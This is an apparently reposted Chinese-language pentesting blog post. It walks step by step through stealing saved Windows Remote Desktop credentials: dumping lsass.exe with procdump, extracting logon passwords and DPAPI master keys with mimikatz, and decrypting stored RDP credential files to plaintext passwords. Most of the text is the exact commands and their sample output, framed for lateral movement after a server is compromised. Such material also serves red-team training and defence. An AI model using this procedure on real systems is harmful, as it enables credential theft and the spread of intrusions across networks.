当我们拿到服务器权限时,往往会更深层次的渗透,在建立据点的时候,往往会分析到底是横向还是纵向,在开始之前会进行一些信息收集,使用procdump+mimikatz可以一步到位的获取到远程链接凭证。
1.何为凭证:
在个人电脑使用mstsc进行远程链接时会输入所需账户密码,可能有些人觉得麻烦就会选择保存凭证信息,在下次链接时就不需要再次输入用户名密码,但是此操作会在本地保存一份凭证。如果有人进入到了该服务器,反之:就会产生一种连锁反应。
凭证的获取:
在windows桌面下可以使用 procdump+mimikatz 一步到位,具体流程
1.procdump 请使用管理员权限运行
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
先使用procdump读取lsass.exe进程里面的内容,lsass.exe时本地安全和远程登录策略
得到以下回显:
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[22:46:56] Dump 1 initiated: C:UserskkDesktopProcdumplsass.dmp
[22:46:56] Dump 1 writing: Estimated dump file size is 62 MB.
[22:46:56] Dump 1 complete: 62 MB written in 0.5 seconds
[22:46:57] Dump count reached.
会在当前目录下产生一个lsass.dmp文件。
然后用mimikatz搞定即可
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
2.获取远程凭证
这里我用本机做的测试。先在cmd中查看Credentials目录下是否有保存凭证
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
如果有列出文件,说明有保存的凭证,进入%userprofile%AppDataLocalMicrosoftCredentials文件夹将其下载下来
注意:如果cmd中有列出文件,但在文件中无法看到,请在查看选项里取消隐藏系统文件。
3.记录guidMasterKey的值
将刚刚下载出来的文件保存在固定位置:使用mimikatz读取
privilege::debug
dpapi::cred /in:C:Users99283Desktopmim100A35A6564D355D582583D428DD668A
将回显内容里面的guidMasterKey记录下来,等会要用
guidMasterKey:{41d516ca-fe4c-4c2d-a639-f72638f58802}
4.读取MasterKey
先使用mimikatz绑定刚刚dump出来的lsass.dump
sekurlsa::minidump lsass.dmp
然后读取里面的内容
sekurlsa::dpapi
找到刚刚记录下来的guidMasterKey对应的guid
记录对应MasterKey
82c234e8fc1043fc18bf907bf68284c7098083436ed71ba075c6553ec6d78a503942cf4e5ce54ce97b1354b3db5ebb81d28a7c874a38933e9dfc16a48ae818a3
5.解密内容,获取远程凭证信息
上面获取到了对应的GuidMasterKey和对应的MaserKey后,我们就可以进行解密
dpapi::cred /in:远程凭证文件地址 /masterkey:记录下来的MasterKey
就可以得到相应的password,还是明文
原文始发于微信公众号(PwnPigPig):内网知识体系之远程凭据获取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论